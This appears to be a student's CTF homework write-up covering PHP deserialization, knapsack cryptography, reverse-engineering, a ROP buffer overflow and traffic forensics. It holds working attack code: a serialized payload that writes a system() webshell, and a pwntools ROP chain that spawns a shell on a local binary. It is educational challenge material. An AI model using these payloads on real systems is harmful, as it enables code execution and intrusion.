2.9作业
1
绕过 __wakeup()、__sleep()
构造参数:$u、$p
code = $u . $p(由 $u 与 $p 拼接而成)
<?php
/**
 * Plain data holder with three public properties, declared in the order
 * username, password, code. serialize() emits them in that same order.
 *
 * Only the constructor is defined here. $code is never assigned, so it
 * stays null and serializes as N;.
 *
 * NOTE(review): the properties are left untyped on purpose. An uninitialized
 * typed property would be omitted from serialize() output and change the result.
 */
class ctfshowvip
{
    public $username;
    public $password;
    public $code;

    /**
     * @param mixed $u value stored in $username
     * @param mixed $p value stored in $password
     */
    public function __construct($u, $p)
    {
        // Both assignments in one destructuring statement; property order is
        // fixed by the declarations above, not by assignment order.
        [$this->username, $this->password] = [$u, $p];
    }
}
// Build one ctfshowvip instance and print its serialized form. The first
// argument lands in username, the second in password.
// NOTE(review): the second argument is PHP source containing a system() call,
// so the printed string has to be treated as hostile input by anything that
// receives it. A consumer is exposed only if it hands untrusted data to
// unserialize(); decoding with json_decode() instead, or calling unserialize()
// with the allowed_classes option restricted, closes that path.
$c = new ctfshowvip('877.php', "<?php system('tac /f*');?>");
$serialized = serialize($c);
print $serialized;
2
私钥由公钥产生
from Crypto.Util.number import *
import random
from secret import flag
def GET_KEY(n):
    """Build a list of n + 1 integer weights, starting with 1.

    A running total starts at 2 and grows by every weight appended, so each
    new weight is at least that total and therefore larger than the sum of
    all weights before it (the list is super-increasing).

    Each round draws two random numbers, in this order: a 0/1 gate, then an
    offset in [0, n]. The offset is added only when the gate is 1.

    NOTE(review): the `random` module is not a cryptographic generator; key
    material in real code should come from `secrets` or os.urandom.
    """
    running_total = 2
    weights = [1]
    for _ in range(n):
        gate = random.randint(0, 1)
        offset = random.randint(0, n)
        term = running_total + offset * gate
        weights.append(term)
        running_total += term
    return weights
def enc(m, k):
    """Return the sum of the weights k[i] at every position where m[i] == 1.

    m is the bit sequence, k the weight list; entries of k beyond len(m) are
    never read. An empty m, or one with no 1 entries, gives 0.
    """
    return sum(bit * k[pos] for pos, bit in enumerate(m) if bit == 1)
# Dead store: this integer form of the flag is replaced by the next statement.
m = bytes_to_long(flag)
# Expand the flag into a flat list of bits, eight per byte, most significant first.
m = list(map(int, ''.join(format(byte, '08b') for byte in flag)))
# GET_KEY returns len(m) + 1 weights; enc() reads only the first len(m) of them.
key = GET_KEY(len(m))
c = enc(m, key)
# The ciphertext and the weight list are written back to back with no separator
# (the list's own '[' marks where it starts).
# NOTE(review): these are the very weights enc() summed over, and GET_KEY makes
# each one larger than the total of all earlier ones. With that list public,
# nothing protects the bit vector. In a real knapsack scheme such a sequence is
# the private key and must never be stored next to the ciphertext.
with open('output.txt', 'w') as f:
    f.write(str(c) + str(key))
3
攻防世界666
封装函数,双击追踪flag
在 strcmp 处追踪:参与比较的是 flag 经 encode 处理后的字符
# Encoded bytes being decoded; 18 characters long.
a2 = "izwhroz\"\"w\"v.K\".Ni"
# XOR key applied to every character.
key = 18
v3 = ""
flag = ""
# The transformations change the characters but not the length.
# Characters are handled three at a time; after the XOR with key, position 1
# of each group gets -6, position 2 gets +6 and position 3 gets XOR 6.
undo = (lambda x: x - 6, lambda x: x + 6, lambda x: x ^ 6)
for i in range(0, 18, 3):
    for offset, step in enumerate(undo):
        v3 = a2[i + offset]
        flag += chr(step(ord(v3) ^ key))
4
from pwn import *
# Architecture that asm() assembles for: 64-bit x86.
context.arch = "amd64"
# Start the local ./rop binary and load the same file for symbol and byte lookups.
io = process("./rop")
elf = ELF("./rop")
# Look the function up in the ELF's symbol table.
system_addr = elf.sym["system"]
# First occurrence of the NUL-terminated bytes "sh" found by searching the file.
sh_addr = next(elf.search(b"sh\x00"))
# Assemble the instruction pair, then find where those bytes first occur.
pop_rdi_ret = next(elf.search(asm("pop rdi; ret")))
# Address of a bare ret instruction.
ret_addr = next(elf.search(asm("ret")))
# NOTE(review): every address above is read from the file on disk and the
# padding is a fixed 0x20 + 0x8 bytes. Presumably that only lines up at run
# time because the exercise binary is built without PIE and without a stack
# protector. Confirm against the binary's mitigation report.
# NOTE(review): the ret placed ahead of the pop rdi entry presumably keeps the
# stack 16-byte aligned when system is reached. Confirm.
payload = b"".join([
    b"b" * (0x20 + 0x8),
    p64(ret_addr),
    p64(pop_rdi_ret),
    p64(sh_addr),
    p64(system_addr),
])
io.sendline(payload)
io.interactive()
5
“找出攻击者的IP”
在 HTTP 协议的流量中:
可疑点:有请求 POST 了 hacker.php;追踪 hacker.php 对应的 HTTP 流并对内容做 URL 解码,确认这是攻击者开的后门,这些请求的来源地址就是要找的攻击者 IP。